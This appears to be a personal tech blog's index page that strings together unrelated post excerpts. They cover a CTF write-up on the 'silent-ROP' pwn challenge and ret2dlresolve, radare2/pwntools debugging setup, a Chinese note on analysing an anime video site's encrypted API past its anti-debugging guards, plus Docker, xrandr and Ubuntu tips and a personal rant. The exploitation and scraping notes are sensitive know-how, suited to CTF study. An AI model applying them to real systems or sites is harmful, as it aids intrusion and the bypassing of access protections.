0x0 Different

The memory mapping is little differnt

when init function is not called, notice that rw- page in the memory map have size of 0x2000 from 0x0804b000 - 0x0804d000

1

0x0804b000 - 0x0804d000 - usr     8K s rw- /home/aynakeya/ctf/k3rn3lctf2021/silent-rop/silent-ROP /home/aynakeya/ctf/k3rn3lctf2021/silent-rop/silent-ROP ; map.

however, after enter the main or called init function, the rw- page in the memory map now have size of 0x1000 from 0x0804c000 - 0x0804d000

1

0x0804c000 - 0x0804d000 - usr     4K s rw- /home/aynakeya/ctf/k3rn3lctf2021/silent-rop/silent-ROP /home/aynakeya/ctf/k3rn3lctf2021/silent-rop/silent-ROP ; obj._GLOBAL_OFFSET_TABLE_

0x0 Introduction

in th recent k3rn31ctf, there is a pwn question silent-ROP.

In this challenge, there is no output, neither put or printf is imported. So there is no way we can get the libc address/version. Therefore, normal way of ret2libc didn't work in this case, because we can't get the address of system function.

1
2
3
4
5
6
7
8
9
10

:> ii
[Imports]
nth vaddr      bind   type   lib name
―――――――――――――――――――――――――――――――――――――
1   0x08049070 GLOBAL FUNC       read
2   0x00000000 WEAK   NOTYPE     __gmon_start__
3   0x08049080 GLOBAL FUNC       __libc_start_main
4   0x00000000 GLOBAL OBJ        stdin
5   0x08049090 GLOBAL FUNC       setvbuf
6   0x00000000 GLOBAL OBJ        stdout

To solve this question, it required technique called ret2dlresolve, after serveral hour of reading article, i finally understand the process of return to dl resolve

Brief

When using radare2 debugger, How to deal with the user input when debugging? There are two simple method.

• use rarun2 with stdio
• use pwntools with debugger.

use rarun2

1. open second terminal, enter tty, record the output

   1 2	$ tty /dev/pts/2

2. create a file p.rr2, write stdio equal the tty value you get from second termial

   1 2	# p.rr2 content stdio=/dev/pts/1

3. in second terminal, run sleep 9999999999 to wait for output and input
4. run r2 -r p.rr2 -d vuln in the first terminal and start debugging!

see more: doc

use pwntools

in the pwntool template, add following code

1
2
3
4
5
6

io = start()
pid = util.proc.pidof(io)[0]
print("The pid is: "+str(pid))
util.proc.wait_for_debugger(pid)
input("press enter to continue")
io.interactive()

then, run radare2 with r2 -d pid, using the pid from scripts.

前言

最近在做爬虫项目，发现一个动漫网站挺好，可以这个视频解析似乎有加密，最近正好有空，看了一下这个解密是怎么做出来的

准备

介绍一下今天的对象 agefans。

那么首先开F12看看http有哪些请求。 然后这网站甚至还开了清console和不停debug来阻止我们使用开发者工具。

但是没有关系，把breakpoint关掉就行了。

简单的分析

先搜索一下视频文件在哪里出现了，

可以发现视频地址是在 _getplay2 这个api中得到的，

进一步分析可以得到_getplayer2是通过_getplay 302 跳转的。

我真是服了，图书馆里能不能好好学习，别秀恩爱了，要秀去房间里秀，给我整吐了。

真的麻了，那男的5分钟摸一次女生头发，还搁那讨论，我要气死了。

think of this two code

1
2
3
4
5
6

powers = [lambda x: x**i for i in range(10)]
print(powers[3](2))
powers1 = []
for i in range(10):
	powers1.append(lambda x:x**i)
print(powers1[3](2))

What do you expect the result.

If you stuck on the setting menu.

try to use

1
2
3

cd "C:\Program Files\Docker\Docker"

./DockerCli.exe -SwitchDaemon

步骤很简单

假如你需要1920*1080的分辨率

1. cvt 1920 1080, 这段会输出类似这样的数据

1
2

# 1920x1080 59.96 Hz (CVT 2.07M9) hsync: 67.16 kHz; pclk: 173.00 MHz
Modeline "1920x1080_60.00"  173.00  1920 2048 2248 2576  1080 1083 1088 1120 -hsync +vsync

2. 输入 xrandr 查看当前的output是啥, 如果是virtualBox一般来说是 Virtual1, 其他的自己看哪个输出多就是哪个。

3. xrandr --newmode "1920x1080_60.00" 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync 复制粘贴cvt给的数据

4. xrandr --addmode Virtual1 1920x1080_60.00 添加分辨率到输出里

5. 在setting中设置分辨率即可

6. 重启后可能会消失，把步骤3,4放到.profile里即可

打开ubuntu之后发现开不起terminal.

然后firefox等其他应用正常打开。

开ctrl+alt+f3进入命令行界面发现捏马的

no module named apt_pkg

突然想起来，关机之前把/usr/bin/python3的软链接把原来的python3.8改成python3.9了。。。

所以把软连接改回python3.8再reboot就行了。

喵喵咪的，vps提供商断电了，博客全没了